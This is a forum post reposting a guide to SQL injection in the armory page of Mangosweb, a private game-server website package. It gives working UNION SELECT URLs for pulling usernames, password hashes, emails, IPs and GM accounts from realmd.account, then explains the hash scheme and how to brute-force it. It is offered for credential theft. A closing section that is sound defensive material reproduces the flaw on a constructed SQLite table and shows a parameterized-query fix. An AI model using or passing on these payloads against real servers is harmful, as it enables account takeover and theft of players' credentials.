Found this guide while browsing. Looks neat.
This is not an ingame exploit. It can be used to steal usernames and passwords, even GM accounts. First of all, the following guide is only for the servers that use Mangosweb to run their homepage. This is a very popular site and many private servers run Mangosweb.
The exploit is hidden within the armory. With a SQL injection we can extract passwords or other sensitive information. Access the site. For example:
www.target.domain/index.php
Replace:
index.php
with
index.php?n=armory&sub=viewchar&char=1 union select 11,22,33,44--
If you see 11 on the resulting page, the following will work. If you don't see anything, try changing char=1 to char=2 or any other number, until you find a character that doesn't exist.
Now replace:
index.php
with
index.php?n=armory&sub=viewchar&char=1 union select <field>,null,null,null from <database> where <condition>--
We will work with <database>=realmd.account
The <field> can be:
id - id of the account
username - name of the account
I - password of the account
gmlevel - account level (0, 1, 2 or 3)
email - the registration email
joindate - the date the account was made on
last_ip - the IP the user last logged into the server from
and others...
And the <condition> for example can look like this:
username='admin'
gmlevel=3
id=5
gmlevel=2 and id<100
and other combinations.
So if you want to retrieve the password of the user john you will replace
index.php
with
index.php?n=armory&sub=viewchar&char=1 union select I,null,null,null from realmd.account where username='john'--
If everything went well you should see a 40-character encrypted password like this:
7e27e687f56923bec2ff792cbe983d8ff5c5fc10
This is the hash of the password encrypted with SHA-1 (160 bits). So, presuming john's password was "test", the encrypted password above resulted from JOHN:TEST. So you see, the encrypted password also contains the username, separated from the password with ":".
SHA1(CONCAT(UPPER('john'),':',UPPER('test'))) - this is the expression that produced 7e27e687f56923bec2ff792cbe983d8ff5c5fc10. You can see the UPPER() function, which means passwords aren't case sensitive and are converted to uppercase on creation.
Because SHA-1 is one-way, you can't reverse engineer it. You must brute-force it, using the prefix JOHN: . Also you must exclude lowercase characters while brute-forcing; use only 0-9, A-Z and perhaps special characters. Have fun. I will write a guide perhaps if you are interested... until then... try cracking it on your own.
All credit goes to xkyve from Deathsoft.com
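For server operators reading this: the armory's char parameter is injectable because its value is pasted straight into the SQL text. The following is an added example (not Mangosweb's code) that reproduces the flaw against a constructed in-memory SQLite stand-in for the characters table and shows the fix: type-check the id and bind it as a parameter. Table and column names are assumptions, not the real MaNGOS schema.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the game database (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE characters("
        "guid INTEGER, name TEXT, level INTEGER, class INTEGER)"
    )
    db.execute("INSERT INTO characters VALUES (1, 'Thrall', 70, 3)")
    return db


def viewchar_vulnerable(db, char):
    # Mirrors the flaw described in the post: the query string is built by
    # concatenation, so "1 union select 11,22,33,44--" becomes part of the SQL
    # and the attacker-chosen row (11, 22, 33, 44) is returned with the page.
    sql = f"SELECT guid, name, level, class FROM characters WHERE guid={char}"
    return db.execute(sql).fetchall()


def viewchar_hardened(db, char):
    # 1) A character id is an integer; anything else is rejected outright.
    try:
        guid = int(char)
    except (TypeError, ValueError):
        return None
    # 2) Even a valid integer is passed as a bound parameter, never as text,
    #    so the value can only ever be compared against guid, not parsed as SQL.
    sql = "SELECT guid, name, level, class FROM characters WHERE guid=?"
    return db.execute(sql, (guid,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    probe = "1 union select 11,22,33,44--"  # the probe payload from the post
    print("vulnerable:", viewchar_vulnerable(db, probe))
    print("hardened:  ", viewchar_hardened(db, probe))
    print("hardened, legitimate id:", viewchar_hardened(db, "1"))
```

The same two fixes apply to the username and gmlevel lookups in the guide; the union only works because the parameter reaches the database as SQL text.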